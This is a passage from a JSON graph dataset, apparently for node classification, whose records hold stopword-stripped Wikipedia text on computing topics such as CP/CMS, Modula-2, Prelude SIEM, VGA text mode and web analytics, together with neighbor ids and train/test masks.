prototype s/370s causing critical delays mvs project particular remarkable technical feat transformed mvs development award cp-370 developers probably rescued cp project extinction despite aggressive efforts cancel project august 1972 marked end cp/cms ibm system/370 advanced function announcement included new s/370-158 -168 address relocation hardware s/370s four new operating systems dos/vs dos virtual storage os/vs1 os/mft virtual storage os/vs2 os/mvt virtual storage would grow svs mvs vm/370 — re-implemented cp/cms time vm cp/cms development team swelled 110 people including documenters vm/370 real ibm system longer part ibm type-iii library source code distribution continued several releases however see cp/cms free software details 1968 principals small consulting firm connecticut called computer software systems audacious idea leasing ibm system/360-67 run cp/cms reselling computer time audacious ibm would typically lease 50–100k/month systems two-person startup third fourth employees dick orenstein one authors ctss dick bayles csc – primary architect cp-67 key hires cp/cms world included harold feinleib mike field robert jesurum bob jay late november 1968 persuaded ibm accept order small feat secured initial funding css took delivery first s/360-67 began selling time december 1968 css quickly discovered selling every available virtual machine minute published prices could barely take enough revenue pay machine lease whirlwind development program followed ramping cp/cms performance point could resold profitably began fork cp/cms source code evolved independently fifteen years operating system soon renamed vp/css company went public renamed national css although vp/css shared much cp/cms parent vm/370 sibling diverged many important ways business reasons system run profit users frustrated could stop paying time simply hanging phone forces gave high priority factors affecting performance usability customer support vp/css soon became known routinely supporting two three times many interactive users comparable vm systems early ncss enhancements involved areas page migration dispatching file system device support efficient fast-path hypervisor functions accessed via diagnose diag instruction later features included packet-switched network filedef-level pipe interprocess/intermachine communication database integration similar features also appeared vm implementation ultimately ncss development team rivaled size ibm implementing wide array features vp/css platform remained use least mid-80s ncss acquired dun bradstreet 1979 renamed dbcs dun bradstreet computer services increased focus nomad product changed business strategy embrace vm platforms process discontinued support development vp/css probably last non-vm fork cp/cms interactive data corporation idc followed plan similar national css selling time-sharing services based cp/cms platform focus time financial services varian reports idc several s/360-67 systems running cp/cms one ibm first relocating s/370 presumably referring s/370-145 1971 first dat box perhaps systems announced 1972 system/370 advanced function announcement including s/370-158 -168 details citations sought history idc cp/cms time-sharing following notes provide brief quotes primarily pugh varian see references illustrating development context cp/cms direct quotes rather paraphrases provided authors perspectives color interpretations background information citations",
    "neighbors": [
      6529,
      5378,
      2179,
      4996,
      6148,
      10883,
      10508,
      3725,
      7053,
      9361,
      9619,
      9468,
      789,
      11539,
      11673,
      9370,
      284,
      3359,
      10273,
      421,
      6442,
      1323,
      7983,
      8879,
      7217,
      8627,
      9139,
      6325,
      7477,
      7733,
      10040,
      10803,
      5562,
      573,
      8509,
      1219,
      964,
      8388,
      6342,
      11075,
      1235,
      7507,
      8063,
      1501,
      863,
      3938,
      5603,
      868,
      3429,
      6502,
      9829,
      6248,
      5363,
      6772,
      375,
      2168,
      2172,
      2813,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 6558,
    "label": 9,
    "text": "Modula-2:modula-2 modula-2 computer programming language designed developed 1977 1985 niklaus wirth swiss federal institute technology zurich eth zurich revision pascal serve sole programming language operating system application software personal workstation lilith principal concepts wirth viewed modula-2 successor earlier programming languages pascal modula language design also influenced mesa language new programming possibilities early personal computer xerox alto xerox wirth saw 1976 sabbatical year xerox parc computer magazine byte devoted august 1984 issue language surrounding environment modula-2 general purpose procedural language sufficiently flexible systems programming much broader application particular designed support separate compilation data abstraction straightforward way much syntax based wirth earlier better-known language pascal modula-2 designed broadly similar pascal elements syntactic ambiguities removed important addition module concept direct language support multiprogramming language allows compilation single pass compiler gutknecht wirth four times faster earlier multi-pass compilers example source code hello world program modula-2 module may used encapsulate set related subprograms data structures restrict visibility portions program module design implemented data abstraction feature modula-2 clean way modula-2 programs composed modules made two parts definition module interface portion contains parts subsystem exported visible modules implementation module contains working code internal module language strict scope control particular scope module considered impenetrable wall except standard identifiers object outer world visible inside module unless explicitly imported internal module object visible outside unless explicitly exported suppose module m1 exports objects b c p enumerating identifiers explicit export list objects b c p module m1 become known outside module m1 m1.a m1.b m1.c m1.p exported qualified manner universe assumed module m1 global exporting module name i.e m1 used qualifier followed object name suppose module m2 contains following import declaration means objects exported module m1 universe enclosing program used inside module m2 referenced qualified manner like m1.a m1.b m1.c m1.p example qualified export avoids name clashes instance another module m3 would also export object called p still distinguish two objects since m1.p differs m3.p thanks qualified export matter objects called p inside exporting modules m1 m3 alternative technique available wide use modula-2 programmers suppose module m4 formulated means objects exported module m1 universe used inside module m4 mere references exported identifiers unqualified manner like b c p. example technique unqualifying import allows use variables objects outside exporting module exactly simple i.e unqualified manner inside exporting module walls surrounding modules become irrelevant objects explicitly allowed course unqualifying import usable name clashes export import rules may seem unnecessarily restrictive verbose safeguard objects unwanted access also pleasant side-effect providing automatic cross-referencing definition every identifier program identifier qualified module name definition comes module otherwise occurs unqualified simply search backwards either encounter declaration identifier occurrence import statement names module comes property becomes useful trying understand large programs containing many modules language provides limited single-processor concurrency monitors coroutines explicit transfer control hardware access absolute addresses bit manipulation interrupts uses nominal type system two major dialects modula-2 first pim named book programming modula-2 niklaus wirth three major editions pim second third corrected fourth editions describing slight variants language second major dialect iso standardization effort international organization standardization differences amongst several supersets modula-2 language extensions specific application domains several derivative languages resemble modula-2 closely new languages right different languages different purposes strengths weaknesses many current programming languages adopted features modula-2 pim 2,3,4 defines following 40 reserved words pim 3,4 defines following 29 built-in identifiers cambridge modula-2 cambridge microprocessor systems based subset pim4 language extensions embedded development compiler runs dos generates code m68k based embedded microcontrollers running minos operating system mod51 mandeno granville electronics based iso modula-2 language extensions embedded development following iec1131 industry standard programmable logic controllers plc closely related modula-2 mod51 compiler generates standalone code 80c51 based microcontrollers delco electronics subsidiary gm hughes electronics developed version modula-2 embedded control systems starting 1985 delco named modula-gm first high level language used replace machine language code embedded systems delco engine control units ecus significant delco producing 28,000 ecus per day 1988 gm world largest producer ecus first experimental use modula-gm embedded controller 1985 antilock braking system controller based motorola 68xxx microprocessor 1993 gen-4 ecu used cart championship auto racing teams irl indy racing league teams first production use modula-gm use gm trucks starting 1990 model year vcm vehicle control module used manage gm powertrain vortec engines modula-gm also used ecus gm 90° buick v6 family 3800 series ii used 1997-2005 model year buick park avenue modula-gm compilers associated software management tools sourced delco intermetrics modula-2 selected basis delco high level language many strengths alternative language choices 1986 delco electronics spun gm component divisions form delphi 1997 global sourcing required non-proprietary high-level software language used ecu embedded software developed delphi compiled commercial c compilers serious rumors soviet space program many soviet satellites programmed modula-2 according russian wikipedia article modula-2 satellites russian gps framework glonass programmed modula-2 turbo modula-2 compiler integrated development environment modula-2 programming language running ms-dos developed borland never released instead group including borland cofounder niels jensen acting jensen partners bought unreleased codebase redeveloped released topspeed modula-2 topspeed eventually sold clarion owned softvelocity still offers modula-2 compiler part clarion product line z80 cp/m version turbo modula-2 briefly marketed echelon inc. license borland companion release hitachi hd64180 marketed micromint inc. development tool sb-180 single-board computer",
    "neighbors": [
      9345,
      5634,
      11010,
      9224,
      8587,
      8973,
      2830,
      6414,
      8463,
      10510,
      8082,
      5651,
      9107,
      11411,
      1561,
      8219,
      3613,
      5663,
      6056,
      4777,
      428,
      7983,
      9008,
      5684,
      7479,
      6329,
      8510,
      1474,
      963,
      8262,
      3529,
      4553,
      8524,
      5457,
      11219,
      8057,
      10586,
      219,
      11102,
      7775,
      11490,
      4069,
      11625,
      5612,
      2804,
      3573,
      4341,
      7158,
      3960,
      1145,
      1790
    ],
    "mask": "Test"
  },
  {
    "node_id": 6559,
    "label": 4,
    "text": "Prelude_SIEM_(Intrusion_Detection_System):prelude siem intrusion detection system prelude siem security information event management siem tool driving security prelude siem collect centralize information company security offer single point view manage thanks logs flows analyzer prelude siem create alerts intrusions security threats network real time prelude siem provide multiple tools forensic reporting big data smart data identify weak signals advanced persistent threat apt finally prelude siem embeds tools exploitation phase make works easier operators help risk management malicious user software may able evade detection single ids nids hids etc becomes exponentially difficult get around defenses multiple protection mechanisms prelude siem comes large set sensors monitoring different kind events prelude siem permits alert collection wan scale whether scope covers city country continent world prelude siem siem system capable inter-operating systems available market implement natively intrusion detection message exchange format idmef rfc 4765 format start demanded around world way natively idmef compatible opensource ids auditd nepenthes nufw ossec pam samhain sancp snort suricata kismet etc anyone write ids use 3rd party sensors available given prelude siem open apis libraries since 2016 prelude idmef partner program prelude siem also idmef compatible many commercial ids prelude siem provides siem functions three modules alert sem analyze ans archive sim one true siem alternative market plus prelude siem promotes use ietf security standards secef project prelude idmef partner program prelude siem collects normalizes sorts aggregates correlates displays security events regardless types surveillance equipment beyond capacity processing types event logs system logs syslog flat files etc prelude siem natively compatible many ids prelude siem main characteristics following prelude siem oss designed scalable way simply adapt environment free public open-source version gplv2 small infrastructures tests educational purposes open-source version composed following main modules modules base alert module commercial version commercial version also add many functionalities modules scale performances architecture possibilities prelude siem commercial version scalable professionally usable high performance version prelude real-world environments prelude soc fully scaled version mainly soc security operations center usage commercial versions organized like",
    "neighbors": [
      7813,
      10790,
      7983,
      1232,
      823,
      7192,
      8922,
      186,
      11611,
      4797,
      3486
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6560,
    "label": 4,
    "text": "NCP_Engineering:ncp engineering ncp engineering styled 'ncp engineering nuremberg-based company produces software remote access industrial internet things security information security ncp products use virtual private network vpn technologies like encryption personal firewalls electronic certificates public key infrastructure pki secure data communication ncp made ipsec vpn client compatible windows 8 windows 10 ios os x linux android operating systems ncp abbreviation network communications products supplement engineering describes company produces software in-house data processing ncp engineering founded nuremberg germany 1986 company produces software secure data communication internet networks via 3g/4g wireless lans core ncp business provisioning secure communication connections stationary mobile end-devices well affiliate branch networks company headquarters 2007 ncp partnered watchguard technologies january 2010 ncp-e established north american affiliate ncp engineering inc february 2010 ncp engineering awarded us patent 8811397 b2 system method data communication user terminal gateway via network node ncp engineering involved esukom project development real-time security solution protects corporate networks using integrated security solutions based unified metadata format since 2010 simu project partner security information event management small smes ncp engineering focused optimizing security corporate networks many years working together 2017 ncp engineering juniper networks intensified collaboration technology partnership",
    "neighbors": [
      3851,
      3500,
      10831,
      9744,
      8753,
      5749,
      823,
      11611,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 6561,
    "label": 4,
    "text": "Application_permissions:application permissions application permissions widespread coarse-grained way limit applications access sensitive information example sound recorded microphone valuable resources like battery internet traffic account balance implemented major state art pda operation systems android ios windows web browsers web services providing oauth api list available permissions usually contains accessing android 6 permissions usually revokable though appops mechanism oses usually present vanilla android aftermarket oses usually removed stock oses allowing deprive apps access personal data android ≥6 apps request permissions run time requires app developer collaboration developer free use non-runtime permissions app likely crash permission granted ones granting permission target audience app permissions marked permissions previous versions os like internet access non-revocable even show apps installation fixed xprivacy ios usage permissions regulated using guidelines android ecosystem usage permissions often abused order spy users many applications require much permissions monetize integrating libraries advertising networks showing ads spying users better target webpermissions permission system web browsers web application needs data behind permission must request first user sees window asking make choice choice remembered cleared lately currently following resources controlled cases permissions implemented 'all-or-nothing approach user either grant requested permissions app unable use app even user revoke permission app blackmail user refusing operate example crashing solutions xprivacy instead providing access requested data instead throwing exception crashing app returning disinformation make app operate permission granted also possible use static analysis analyze requested permissions",
    "neighbors": [
      700,
      5637,
      6750
    ],
    "mask": "Test"
  },
  {
    "node_id": 6562,
    "label": 4,
    "text": "Knowledge-based_authentication:knowledge-based authentication knowledge-based authentication commonly referred kba method authentication seeks prove identity someone accessing service financial institution website name suggests kba requires knowledge private information individual prove person providing identity information owner identity two types kba static kba based pre-agreed set shared secrets dynamic kba based questions generated wider base personal information static kba also referred shared secrets shared secret questions commonly used banks financial services companies e-mail providers prove identity customer allowing account access fall-back user forgets password point initial contact customer business using static kba must collect information shared provider customer—most commonly questions corresponding answers data must stored retrieved customer comes back access account weakness static kba demonstrated incident 2008 unauthorised access gained e-mail account former alaska governor sarah palin yahoo account password could reset using shared secret questions including meet spouse along date birth zip code former governor answers easily available online identity verification providers recently introduced secret sounds pictures effort help secure sites information tactics require methods data storage retrieval secret questions dynamic kba high level authentication uses knowledge questions verify individual identity require person provided questions answers beforehand questions compiled public private data marketing data credit reports transaction history initiate process basic identification factors name address date birth must provided consumer checked identity verification service identity verified questions generated real time data records corresponding individual identity provided typically knowledge needed answer questions available person wallet companies call out-of-wallet questions making difficult anyone actual identity owner know answer obtain access secured information generally period time person given respond questions number attempts limited prevent answers researched dynamic kba employed several different industries verify identities customers means fraud prevention compliance adherence type kba based existing relationship consumer gives businesses way higher identity assurance customer identity account origination",
    "neighbors": [
      3329,
      11244,
      4435,
      1557,
      957,
      8735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6563,
    "label": 4,
    "text": "Unified_access_management:unified access management unified access management uam refers identity management solution used enterprises manage digital identities provide secure access users across multiple devices applications cloud on-premise unified access management solutions provide single platform manage access across diverse set users devices applications whether on-premise cloud unified access management uam evolution identity access management iam systems goal unified access management similar identity access management manage identities individual entities people devices authentication authorization roles privileges within across enterprise systems secure manner bolsters productivity traditional identity access management tools work well addressing specific portions enterprise specific app environments on-premises cloud specific users employees vs. external partners however many businesses must harness multiple iam solutions example may use microsoft active directory web access management tool manage access on-premise applications require identity-as-a-service idaas solutions manage access cloud software service saas apps managing multiple identities access management systems burden information technology departments adds cost requiring maintenance multiple solutions often requires users provisioned de-provisioned multiple systems given iam system may manage access specific devices specific systems fragmented identity management enterprise may able provide true single sign multi-factor authentication effective user lifecycle management slowing digital transformation significant financial impact forrester found 4.47 million annual loss productivity due poor access management per every 10,000 employees hybrid environments complicate access management many organizations able dispense on-premises systems example 2018 47 decision makers surveyed reported majority organization ’ custom applications still run on-premises extensive cost moving legacy systems means organizations likely remain hybrid time uam introduced onelogin uam differs iam providing umbrella solution central cloud directory single source truth identities access cloud directory integrates on-premise identity providers cloud identity providers requests information identity providers updates user lifecycle management work one place cloud directory let uam update appropriate identity providers uam provides functionality needed secure access across users devices typically includes",
    "neighbors": [
      3521,
      7368,
      11244,
      3086,
      7729,
      210,
      467,
      5433
    ],
    "mask": "None"
  },
  {
    "node_id": 6564,
    "label": 7,
    "text": "Urgent_computing:urgent computing urgent computing prioritized immediate access supercomputers grids emergency computations severe weather prediction matters immediate concern applications provide decision makers information critical emergencies waste time waiting job queues need access computational resources soon possible",
    "neighbors": [
      5956,
      3927
    ],
    "mask": "None"
  },
  {
    "node_id": 6565,
    "label": 4,
    "text": "Remote_backup_service:remote backup service remote online managed backup service sometimes marketed cloud backup backup-as-a-service service provides users system backup storage recovery computer files online backup providers companies provide type service end users clients backup services considered form cloud computing online backup systems typically built client software program runs given schedule systems run day usually night computers n't use newer cloud backup services run continuously capture changes user systems nearly real-time online backup system typically collects compresses encrypts transfers data remote backup service provider servers off-site hardware many products market – offering different feature sets service levels types encryption providers type service frequently target specific market segments high-end lan-based backup systems may offer services active directory client remote control open file backups consumer online backup companies frequently beta software offerings and/or free-trial backup services fewer live support options mid-1980s computer industry great state change modems speeds 1200 2400 baud making transfers large amounts data slow 1 mb 72 minutes faster modems secure network protocols development tape backup systems gained popularity period need affordable reliable online backup system becoming clear especially businesses critical data online/remote backup services came existence heyday dot-com boom late 1990s initial years large industry service providers capturing market share understanding importance role online backup providers playing web services arena today service providers online backup services position services using saas software service paas platform service strategy relevance predicted increase exponentially years come personal enterprise data storage needs rise last years also witnessed healthy rise number independent online backup providers enterprise-class cloud backup solution must include on-premises cache mitigate issues due inconsistent internet connectivity hybrid cloud backup works storing data local disk backup captured high speed either backup software d2d2c disk disk cloud appliance encrypts transmits data service provider adds protection local disasters recent backups retained locally speed data recovery operations number cloud storage appliances market used backup target including appliances ctera networks storsimple twinstrata hybrid cloud backup also beneficial enterprise users security concerns storing data locally sending cloud backup users perform necessary encryption operations incl technologies like data encryption additionally applied choose public cloud service provider important compression backup data local backup cache used compress data sending cloud order lower network bandwidth load improve backup speed becomes critical enterprises backup huge databases like oracle ms sql huge files like virtual machine images mail server databases edb files exchange recent improvements cpu availability allow increased use software agents instead hardware appliances enterprise cloud backup software-only approach offer advantages including decreased complexity simple scalability significant cost savings improved data recovery times online backup services usually priced function following things vendors limit number versions file kept system services omit restriction provide unlimited number versions add-on features plug-ins like ability back currently open locked files usually charged extra services provide built remote backup services reduce amount data sent wire backing changed files approach backing means customers total stored data reduced reducing amount data sent also stored drastically reduced transmitting changed data bits binary block level incremental backups solutions transmit changed binary data bits waste bandwidth transmitting file data small amounts change remote backup advantages traditional backup methods remote backup disadvantages traditional backup methods services provide expert backup management services part overall offering services typically include three distinct types backup modes scheduled manual event-based",
    "neighbors": [
      2432,
      2944,
      5504,
      6785,
      6280,
      4623,
      8465,
      5650,
      7955,
      405,
      11030,
      10265,
      10522,
      4126,
      929,
      6435,
      3366,
      11178,
      3629,
      10032,
      10161,
      9906,
      5300,
      4023,
      2487,
      3773,
      7874,
      10054,
      1358,
      3794,
      7381,
      3800,
      728,
      11097,
      2267,
      11482,
      4194,
      4710,
      5737,
      5482,
      3819,
      236,
      3692,
      6514,
      5491,
      9202,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 6566,
    "label": 2,
    "text": "Stack_(Haskell):stack haskell stack tool build haskell projects manage dependencies uses cabal library together default curated version hackage repository stack competes cabal binary cabal-install created result overall criticism dependency problems however provide package format uses existing codice_1 files complements projects additional codice_2 file",
    "neighbors": [
      10817,
      3876,
      8491,
      6797,
      7983,
      5397,
      4309
    ],
    "mask": "Test"
  },
  {
    "node_id": 6567,
    "label": 5,
    "text": "Inter-Asterisk_eXchange:inter-asterisk exchange inter-asterisk exchange iax communications protocol native asterisk private branch exchange pbx software supported softswitches pbx systems softphones used transporting voip telephony sessions servers terminal devices original iax protocol deprecated superseded second version commonly called iax2 iax2 protocol published informational non-standards-track rfc 5456 discretion rfc editor february 2010 iax voip protocol used type streaming media including video mainly designed ip voice calls iax uses single user datagram protocol udp data stream endpoints session signaling media payloads thus uses single udp port number typically 4569 feature provides benefits traversing network address translators network boundaries simplifies firewall configuration voip protocols typically use independent streams signaling media session initiation protocol sip h.323 media gateway control protocol mgcp carry media real-time transport protocol rtp iax binary-encoded protocol new extension features must new numeric code allocated historically modeled internal data passing asterisk modules iax supports trunking multiplexing channels single link trunking data multiple sessions merged single stream packets two endpoints reducing ip overhead without creating additional latency advantageous voip transmissions ip headers use large percentage bandwidth iax2 supports native encryption control media streams using aes-128 versions iax protocol created mark spencer much development carried asterisk open-source community primary goals iax minimize bandwidth used media transmissions particular attention drawn control individual voice calls provide native network address translation nat transparency intended easy use behind firewalls",
    "neighbors": [
      8386,
      9381,
      6567,
      7407,
      6993,
      2994,
      5843,
      11413,
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 6568,
    "label": 2,
    "text": "Dmalloc:dmalloc dmalloc c memory debugger library written gray watson assist programmers finding variety dynamic memory allocation mistakes replaces parts malloc c standard library provided operating system compiler versions produce information intended help programmer detect problematic code dmalloc find memory leaks off-by-one errors usage invalid addresses library functions calls",
    "neighbors": [
      1952,
      3367,
      814,
      7983,
      5492,
      2045,
      7902
    ],
    "mask": "None"
  },
  {
    "node_id": 6569,
    "label": 5,
    "text": "NetCache:netcache netcache former web cache software product owned developed netapp 1997 2006 hardware product family incorporating netcache software netcache software started commercial fork harvest object cache developed internet middleware corporation imc consisted former harvest project developers including peter b. danzig professor university southern california late 1996 software named internet middleware object cache referred cached 2 later cached 3 1997 imc acquired netapp software renamed netcache danzig becoming chief architect cto netcache division 2006 netapp sold netcache business technology blue coat systems similar line proxysg appliances became expensive product existing netapp customers hardware netcache appliance included netapp data ontap microkernel write anywhere file layout file system achieving four times throughput software equivalents available time according netapp comparisons starting ontap version 9.5 similar functionality introduced flexcache name november 2005 three hardware models offered former models include",
    "neighbors": [
      3520,
      10816,
      3042,
      10210,
      11104,
      6894,
      890,
      6140
    ],
    "mask": "Test"
  },
  {
    "node_id": 6570,
    "label": 3,
    "text": "VGA-compatible_text_mode:vga-compatible text mode implementation computer monitor text mode vga-compatible hardware quite complex use pc-compatible computers widespread 1980s–1990s particularly dos systems persists today applications even modern desktop computers main features vga text mode colored programmable 16 color palette characters background blinking various shapes cursor block/underline/hidden static/blinking loadable fonts various glyph sizes linux console traditionally uses hardware vga-compatible text modes win32 console environment ability switch screen text mode text window sizes screen character actually represented two bytes aligned 16-bit word accessible cpu single operation lower character byte actual code point current character set higher attribute byte bit field used select various video attributes color blinking character set forth byte-pair scheme among features vga inherited ega cga ultimately mda colors assigned way 4-bit indexed color graphic modes see vga color palette vga modes need mda reverse bright attributes foreground background colors set explicitly vga hardware ability enable underline character attribute bit 0 set however since mda-compatible feature attribute bits used mda must set zero underline shown means bits 3 intensity 7 blink set concurrently bit 0 underline default vga palette setting bit 0 enable underline also change text colour blue means text two colors underlined light blue dark blue default palette despite underline normally visible color modes location underline defaults scanline character glyph rendering invisible underline location set visible scanline default switching mda-compatible monochrome text mode underline appear screen fonts used ega vga monospace raster fonts containing 256 glyphs glyphs font size size changed typically glyphs 8 dots wide 8–16 dots high however height value maximum 32 row glyph coded 8 bit byte high bits left glyph low bits right along several hardware-dependent fonts stored adapter rom text mode offers 8 loadable fonts two active font pointers font font b select two available fonts although usually point font point different fonts attribute bit 3 see acts font selection bit instead foreground color bit real vga hardware overrides bit use color selection many clones emulators color selection remains — meaning one font displayed normal intensity high-intensity error overcome changing palette registers contain two copies 8-color palette modes character box width 9 dots e.g default 80×25 mode however 9th column used spacing characters content changed always blank drawn current background colour exception line graphics enable mode causes code points 0xc0 0xdf inclusive 8th column repeated 9th code points cover box drawing characters must extend way right side glyph box reason placing letter-like characters code points 0xc0–0xdf avoided box drawing characters 0xb0 0xbf extended point right require extending shape cursor restricted rectangle full width character box filled foreground color character cursor current location height position may arbitrary within character box ega many vga clones allowed split-box cursor appearing two rectangles one top character box one bottom setting end cursor start however done original vga cursor completely hidden instead vga standard provide way alter blink rate although common workarounds involve hiding cursor using normal character glyph provide so-called software cursor mouse cursor tui implemented usually thing hardware cursor moving rectangle altered background special glyph text-based interfaces impulse tracker went even greater lengths provide smoother graphic-looking mouse cursor done constantly re-generating character glyphs real-time according cursor on-screen position underlying characters generally two ways access vga text-mode application video bios interface directly accessing video ram i/o ports latter method considerably faster allows quick reading text buffer reason preferred advanced tui programs vga text buffer located physical memory address 0xb8000 since usually used 16-bit x86 processes operating real-mode first half memory segment 0xb800 text buffer data read written bitwise operations applied part text buffer memory scope current mode accessible shown physical addresses used protected mode applications may either part memory mapped address space access via operating system application modern multitasking os control console accesses part system ram instead actual text buffer computers 1980s fast manipulation text buffer hardware generating individual pixels fast could displayed extremely useful fast ui even relatively modern hardware overhead text mode emulation via hardware apa graphics modes program generates individual pixels stores video buffer may noticeable monitor side difference input signal text mode apa mode size text mode signal may timings vesa standard modes registers used adapter side set parameters text mode apa modes text mode output signal essentially graphic modes source text buffer character generator framebuffer apa depending graphics adapter used variety text modes available ibm pc compatible computers listed table vga compatible cards support mda cga ega modes colored modes design text attributes mda modes specific features see — text could emphasized bright underline reverse blinking attributes far common text mode used dos environments initial windows consoles default 80 columns 25 rows 80×25 16 colors mode available practically ibm compatible personal computers two vga text modes 80×43 80×50 exist rarely used 40 column text modes never popular used demonstration purposes old hardware character sizes graphical resolutions extended vesa-compatible super vga text modes manufacturer dependent cards e.g s3 supported custom large text modes like 100×37 even 160×120 like graphic modes graphic adapters 2000s commonly capable set arbitrarily-sized text mode reasonable limits instead choosing parameters list poor software support deters widespread use custom modes linux dos systems named svga cards program called svgatextmode used set better looking text modes ega vga standard ones particularly useful large ≥ 17 monitors normal 80×25 vga text mode 720×400 pixel resolution far lower typical graphics mode would svgatextmode allows setting pixel clock higher refresh rate larger font size cursor size etc. allows better use potential video card monitor non-windows systems use svgatextmode alternative options linux framebuffer obtain sharp text critical lcd monitors 1280×1024 higher resolution none named standard text modes fits matrix size svgatextmode also allows fine tuning video signal timings despite name program supported modes conform svga i.e vesa standards vga text modes hardware-imposed limitations appear restrictive hardware text mode vga compatible video adapters limited use",
    "neighbors": [
      1408,
      6213,
      134,
      10839,
      2345,
      7983,
      11631,
      6129,
      7442,
      499,
      6868,
      11634,
      823,
      3323,
      5598,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 6571,
    "label": 1,
    "text": "Australian_Plant_Census:australian plant census australian plant census apc provides online interface currently accepted published scientific names vascular flora australia one output interfaces national government integrated biodiversity information system ibis – oracle co. relational database management system australian national herbarium australian national botanic gardens australian biological resources study council heads australasian herbaria coordinate system australian plant census interface provides currently accepted scientific names synonyms illegitimate misapplied excluded names well state distribution data item output hyperlinks online interfaces information system including australian plant name index apni australian plant image index apii outputs australian plant census interface provide information native naturalised vascular plant taxa australia including offshore islands excludes taxa known australia cultivation yet naturalised classification plant families based angiosperm phylogeny group iii system 2009",
    "neighbors": [
      560,
      10513
    ],
    "mask": "Test"
  },
  {
    "node_id": 6572,
    "label": 4,
    "text": "Frank_Rowlett:frank rowlett frank byron rowlett may 2 1908 – june 29 1998 american cryptologist rowlett born rose hill lee county virginia attended emory henry college emory virginia 1929 received bachelor degree mathematics chemistry hired william friedman junior cryptanalyst signals intelligence service sis april fools day 1930 shortly followed sis abraham sinkov solomon kullback 1930s lengthy period training rowlett colleagues compiled codes ciphers use u.s. army began solving number foreign notably japanese systems mid-1930s solved first japanese machine encipherment diplomatic communications known americans red 1939–40 rowlett led sis effort solved sophisticated japanese diplomatic machine cipher codenamed purple u.s. asked greatest contribution effort rowlett said one believed could done rowlett also played crucial role protecting american communications world war ii making fundamental innovative contributions design sigaba cipher machine security important factor saving american lives combat 1964 congress awarded rowlett us 100,000 equivalent partial compensation classified cryptologic inventions addition highly developed cryptanalytic skills rowlett good manager rose quickly within organization 1943–45 chief general cryptanalytic branch 1945-1947 chief intelligence division 1949 1952 technical director office operations armed forces security agency predecessor national security agency nsa rowlett differed general ralph j. canine first director nsa personnel movements including acting differences transferred central intelligence agency cia 1952 worked 1958 time returned nsa special assistant director 1965 rowlett became commandant national cryptologic school 1965 rowlett awarded president award distinguished federal civilian service retired federal service 1966 1965 awarded national security medal president lyndon b. johnson work breaking japanese purple cipher rowlett inducted military intelligence hall fame importance protection american communications information systems security organization named highest award frank byron rowlett award frank rowlett died june 29 1998 age 90",
    "neighbors": [
      4007,
      173,
      7887,
      6578,
      1941,
      6136,
      5310
    ],
    "mask": "None"
  },
  {
    "node_id": 6573,
    "label": 6,
    "text": "Mkdosfs:mkdosfs mkdosfs one applications included dosfstools package used create dos file system linux data storage device usually disk partition mkdosfs options device may specify number blocks device allow mkdosfs guess mkdosfs support creating boot-able partitions",
    "neighbors": [
      5492
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6574,
    "label": 9,
    "text": "ICI_(programming_language):ici programming language ici general purpose interpreted computer programming language originally developed tim long late 1980s dynamic typing flexible data types basic syntax flow control constructs operators c. considered broadly similar perl roughly contemporary like perl also tight integration regular expressions ici acronym primitive data types ici include integers reals strings files safe pointers regular expressions aggregate data types arrays sets associative tables sets heterogeneous nested support usual set operations union intersection etc language supports subroutines nested modules variables lexically scoped subroutine module level unlike structured languages ici allows current scope adjusted tcl also allows example ici object-based many object programming features emulated language using data structure inheritance feature called super-structures support application development ici c-like file i/o system interface support well high-level event trigger facility language also modest standard library built-in functions also notable generous license permits use purpose including commercial alteration resale",
    "neighbors": [
      8582,
      692,
      2045,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 6575,
    "label": 3,
    "text": "Mini_DisplayPort:mini displayport mini displayport minidp mdp miniaturized version displayport audio-visual digital interface announced apple october 2008 2013 new apple macintosh computers port led cinema display however 2016 apple began phasing port replacing new usb-c connector mini displayport also fitted pc motherboards pc notebooks asus microsoft msi lenovo toshiba hp dell manufacturers unlike mini-dvi micro-dvi predecessors mini displayport drive display devices resolutions 2560×1600 wqxga displayport 1.1a implementation 4096×2160 4k displayport 1.2 implementation adapter mini displayport drive display devices vga dvi hdmi interfaces apple offers free license mini displayport reserve right cancel license licensee commence action patent infringement apple apple replaced dvi port macbook macbook air macbook pro imac mac mini mac pro mini displayport use video connector 24-inch cinema display may complicate compatibility",
    "neighbors": [
      9057,
      5661,
      5384,
      1832,
      7594,
      7818,
      10954,
      3629,
      8719,
      11631,
      1400,
      3453,
      7647
    ],
    "mask": "None"
  },
  {
    "node_id": 6576,
    "label": 8,
    "text": "Web_analytics:web analytics web analytics measurement collection analysis reporting web data purposes understanding optimizing web usage however web analytics process measuring web traffic used tool business market research assess improve effectiveness website web analytics applications also help companies measure results traditional print broadcast advertising campaigns helps one estimate traffic website changes launch new advertising campaign web analytics provides information number visitors website number page views helps gauge traffic popularity trends useful market research web analytics processes come four essential stages steps another essential function developed analysts optimization websites experiments goal a/b testing identify suggest changes web pages increase maximize effect statistically tested result interest stage impacts impact i.e. drives stage preceding following sometimes data available collection impacts online strategy times online strategy affects data collected least two categories web analytics off-site on-site web analytics historically web analytics used refer on-site visitor measurement however meaning become blurred mainly vendors producing tools span categories many different vendors provide on-site web analytics software services two main technical ways collecting data first traditional method server log file analysis reads logfiles web server records file requests browsers second method page tagging uses javascript embedded webpage make image requests third-party analytics-dedicated server whenever webpage rendered web browser desired mouse click occurs collect data processed produce web traffic reports fundamental goal web analytics collect analyze data related web traffic usage patterns data mainly comes four sources web servers record transactions log file soon realized log files could read program provide data popularity website thus arose web log analysis software early 1990s website statistics consisted primarily counting number client requests hits made web server reasonable method initially since website often consisted single html file however introduction images html websites spanned multiple html files count became less useful first true commercial log analyzer released ipro 1994 two units measure introduced mid-1990s gauge accurately amount human activity web servers page views visits sessions page view defined request made web server page opposed graphic visit defined sequence requests uniquely identified client expired certain amount inactivity usually 30 minutes page views visits still commonly displayed metrics considered rather rudimentary emergence search engine spiders robots late 1990s along web proxies dynamically assigned ip addresses large companies isps made difficult identify unique human visitors website log analyzers responded tracking visits cookies ignoring requests known spiders extensive use web caches also presented problem log file analysis person revisits page second request often retrieved browser cache request received web server means person path site lost caching defeated configuring web server result degraded performance visitor bigger load servers concerns accuracy log 